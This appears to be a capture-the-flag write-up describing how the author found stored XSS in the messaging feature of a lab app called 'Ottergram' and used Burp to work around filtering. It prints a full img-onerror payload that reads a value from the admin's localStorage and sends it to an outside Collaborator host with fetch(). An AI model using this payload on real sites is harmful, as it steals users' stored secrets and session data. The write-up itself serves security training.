Ottergram

Our favorite place to spot otters had an update and is now vulnerable to XSS. And I couldn't be happier with that.

I kinda had to guess where to start with trying for XSS, but because the messaging was a pretty new feature, I decided to start there. So I send the payload <img src=x onerror=prompt()> on the recipient's end, it rendered, but it did not fire my payload.

So I decided to go look in Burp if there was some filtering going on. And I was correct.

So now I sent this request to Repeater, changed the payload again with the correct syntax and pressed send again. And now the payload did went off. So I created a payload to steal the flag inside the localStorage of the admin user with my Collaborator.

<img src=x onerror="
	fetch('https://1xzjr5ogtyb3ddlwgzz89k115sbjz9ny.oastify.com/?bio=' 
	+encodeURIComponent(localStorage.getItem('flag') || 'null'),
	{ mode: 'no-cors' });"
>

It was difficult getting this payload into a JSON without breaking it, so I let ChatGPT do the lifting for me. Then I send the payload on his way.

A few moment later, I got a response in Collaborator.

And in that response, I saw my flag 🇧🇪

PreviousCopyPasta NextBAC

Last updated 3 months ago